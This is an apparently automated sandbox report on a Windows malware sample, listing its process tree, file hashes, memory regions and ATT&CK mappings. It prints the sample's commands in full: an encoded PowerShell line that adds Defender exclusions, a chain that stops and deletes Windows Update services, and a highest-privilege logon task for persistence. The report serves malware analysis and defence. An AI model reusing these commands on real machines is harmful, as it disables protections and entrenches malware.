Overview

overview

10

Static

static

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    312s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-08-2022 22:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe

  • Size

    2.2MB

  • MD5

    d5dfb8447ced11274942ace31b4279d8

  • SHA1

    5a1b36ef9db72321b3d075712a8888bd921a472c

  • SHA256

    5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

  • SHA512

    92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

  • SSDEEP

    49152:NZMzod1k0XlJTfu7lCwMBLEUGu20S2hnnRYKiPCZYj8bkN2P:N2C1k+bMlCwWl2qhnnRYKECZYI44

Score
10/10
discoveryevasionexploit

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Stops running service(s) 3 TTPs
    evasion
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Drops file in System32 directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
    "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:856
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:828
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:988
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1012
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1564
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:992
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1984
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1244
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:832
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:1656
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:968
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:764
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:540
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1684
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1596
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1724
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1580
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1668
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1100
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1544
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:776
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:400
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:984
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:964
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1564
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:696
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1872
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:560
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2000
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1276
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
                      3⤵
                      • Creates scheduled task(s)
                      PID:1980
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "OneDrivesSystems"
                    2⤵
                      PID:2044
                      • C:\Windows\system32\schtasks.exe
                        schtasks /run /tn "OneDrivesSystems"
                        3⤵
                          PID:572
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
                        2⤵
                        • Deletes itself
                        PID:784
                        • C:\Windows\system32\choice.exe
                          choice /C Y /N /D Y /T 3
                          3⤵
                            PID:1644
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {A6C67369-ED74-42C7-B34A-08E9C216F1E6} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
                        1⤵
                        • Loads dropped DLL
                        PID:2004
                        • C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
                          C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
                          2⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1124
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
                            3⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1416
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:1332
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                4⤵
                                • Launches sc.exe
                                PID:1744
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                4⤵
                                • Launches sc.exe
                                PID:1648
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                4⤵
                                • Launches sc.exe
                                PID:972
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                4⤵
                                • Launches sc.exe
                                PID:1176
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                4⤵
                                • Launches sc.exe
                                PID:1644
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                4⤵
                                • Modifies registry key
                                PID:1892
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                4⤵
                                • Modifies registry key
                                PID:1052
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                4⤵
                                • Modifies registry key
                                PID:1720
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                4⤵
                                • Modifies registry key
                                PID:1096
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                4⤵
                                • Modifies registry key
                                PID:1560
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1636
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1624
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:1000
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:1348
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:636
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:776
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                4⤵
                                  PID:988
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  4⤵
                                    PID:1772
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    4⤵
                                      PID:1080
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      4⤵
                                        PID:1008
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        4⤵
                                          PID:1520
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          4⤵
                                            PID:800
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:584
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:304
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:688
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:856
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:280
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1064
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
                                              3⤵
                                                PID:1336
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "OneDrivesSystems" /tr "\"C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe\""
                                                  4⤵
                                                  • Creates scheduled task(s)
                                                  PID:1120
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "stopjduuhfz"
                                                3⤵
                                                  PID:1372

                                            Network

                                            MITRE ATT&CK Matrix ATT&CK v6

                                            Initial Access

                                            Execution

                                            Scheduled Task

                                            1
                                            T1053

                                            Persistence

                                            Modify Existing Service

                                            2
                                            T1031

                                            Scheduled Task

                                            1
                                            T1053

                                            Privilege Escalation

                                            Scheduled Task

                                            1
                                            T1053

                                            Defense Evasion

                                            Modify Registry

                                            2
                                            T1112

                                            Impair Defenses

                                            1
                                            T1562

                                            File Permissions Modification

                                            1
                                            T1222

                                            Credential Access

                                            Discovery

                                            System Information Discovery

                                            1
                                            T1082

                                            Lateral Movement

                                            Collection

                                            Exfiltration

                                            Command and Control

                                            Impact

                                            Service Stop

                                            1
                                            T1489

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
                                              Filesize

                                              2.2MB

                                              MD5

                                              d5dfb8447ced11274942ace31b4279d8

                                              SHA1

                                              5a1b36ef9db72321b3d075712a8888bd921a472c

                                              SHA256

                                              5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

                                              SHA512

                                              92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

                                              Download Submit
                                            • C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
                                              Filesize

                                              2.2MB

                                              MD5

                                              d5dfb8447ced11274942ace31b4279d8

                                              SHA1

                                              5a1b36ef9db72321b3d075712a8888bd921a472c

                                              SHA256

                                              5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

                                              SHA512

                                              92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

                                              Download Submit
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                              Filesize

                                              7KB

                                              MD5

                                              4d8d078fbcfa5170ae38216cf89468ad

                                              SHA1

                                              5bf04a3931d46e5ddddaa8fa45a4bc432b9ac923

                                              SHA256

                                              c3b5d0b3c1c16ec699d0e63deb819e2b7ac0eb90d56abee0e90c30f75f537e9a

                                              SHA512

                                              27ef5cb8f6fd7b3eac6229188c79097bc09962ddced4fbae56663eba0091d08d44211a0c7f994e36176be13b90f9fdeb0aa73e633c53998b69c1ecb8f328f84f

                                              Download Submit
                                            • C:\Windows\system32\drivers\etc\hosts
                                              Filesize

                                              5KB

                                              MD5

                                              0684960f1127625c7a987862df0a9047

                                              SHA1

                                              8827566f52b386062aee1cb853a91bede04299b2

                                              SHA256

                                              c10285503e78eacbaa3c00e31a8811afbeaaa07049cc650b6ce961164ba497da

                                              SHA512

                                              143cf0a46f6afda8e796eebf3be8e08fbc8c46c45236988ef678aa3f0d1e4ba44130fbd3d63e5abff4e4419f006f378f2a5dc2ef3b152524502c489fa32d2401

                                              Download Submit
                                            • \Users\Admin\AppData\Local\Temp\onedrives\updates.exe
                                              Filesize

                                              2.2MB

                                              MD5

                                              d5dfb8447ced11274942ace31b4279d8

                                              SHA1

                                              5a1b36ef9db72321b3d075712a8888bd921a472c

                                              SHA256

                                              5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

                                              SHA512

                                              92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

                                              Download Submit
                                            • memory/280-124-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/288-55-0x000000001BEC0000-0x000000001C0DA000-memory.dmp
                                              Filesize

                                              2.1MB

                                              Download
                                            • memory/288-56-0x000007FEFBCC1000-0x000007FEFBCC3000-memory.dmp
                                              Filesize

                                              8KB

                                              Download
                                            • memory/288-54-0x000000013FA70000-0x000000013FCA4000-memory.dmp
                                              Filesize

                                              2.2MB

                                              Download
                                            • memory/304-117-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/400-102-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/540-84-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/560-77-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/572-88-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/636-139-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/688-119-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/696-67-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/764-83-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/776-101-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/776-140-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/784-87-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/828-66-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/832-80-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/856-61-0x00000000027E4000-0x00000000027E7000-memory.dmp
                                              Filesize

                                              12KB

                                              Download
                                            • memory/856-62-0x000000001B700000-0x000000001B9FF000-memory.dmp
                                              Filesize

                                              3.0MB

                                              Download
                                            • memory/856-60-0x000007FEEC700000-0x000007FEED25D000-memory.dmp
                                              Filesize

                                              11.4MB

                                              Download
                                            • memory/856-121-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/856-57-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/856-63-0x00000000027EB000-0x000000000280A000-memory.dmp
                                              Filesize

                                              124KB

                                              Download
                                            • memory/856-59-0x000007FEED260000-0x000007FEEDC83000-memory.dmp
                                              Filesize

                                              10.1MB

                                              Download
                                            • memory/856-64-0x00000000027E4000-0x00000000027E7000-memory.dmp
                                              Filesize

                                              12KB

                                              Download
                                            • memory/856-65-0x00000000027EB000-0x000000000280A000-memory.dmp
                                              Filesize

                                              124KB

                                              Download
                                            • memory/964-104-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/968-82-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/972-123-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/984-103-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/988-141-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/988-69-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/992-73-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1000-137-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1012-70-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1052-131-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1064-125-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1096-133-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1100-99-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1120-127-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1124-143-0x0000000000590000-0x000000000059A000-memory.dmp
                                              Filesize

                                              40KB

                                              Download
                                            • memory/1124-94-0x000000013FC00000-0x000000013FE34000-memory.dmp
                                              Filesize

                                              2.2MB

                                              Download
                                            • memory/1124-91-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1124-147-0x0000000180000000-0x000000018001D000-memory.dmp
                                              Filesize

                                              116KB

                                              Download
                                            • memory/1176-128-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1244-76-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1276-72-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1332-116-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1336-126-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1348-138-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1372-146-0x0000000000080000-0x0000000000086000-memory.dmp
                                              Filesize

                                              24KB

                                              Download
                                            • memory/1372-144-0x00000000000B0000-0x00000000000C1000-memory.dmp
                                              Filesize

                                              68KB

                                              Download
                                            • memory/1372-145-0x0000000001D90000-0x0000000001DA2000-memory.dmp
                                              Filesize

                                              72KB

                                              Download
                                            • memory/1416-115-0x00000000025DB000-0x00000000025FA000-memory.dmp
                                              Filesize

                                              124KB

                                              Download
                                            • memory/1416-107-0x0000000000000000-mapping.dmp
                                              Download
                                            • memory/1416-114-0x00000000025D4000-0x00000000025D7000-memory.dmp
                                              Filesize

                                              12KB

                                              Download
                                            • memory/1416-113-0x000000001B770000-0x000000001BA6F000-memory.dmp
                                              Filesize

                                              3.0MB

                                              Download
                                            • memory/1416-111-0x000007FEEC250000-0x000007FEECDAD000-memory.dmp
                                              Filesize

                                              11.4MB

                                              Download
                                            • memory/1416-112-0x00000000025D4000-0x00000000025D7000-memory.dmp
                                              Filesize

                                              12KB

                                              Download
                                            • memory/1508-78-0x0000000000000000-mapping.dmp
                                              Download
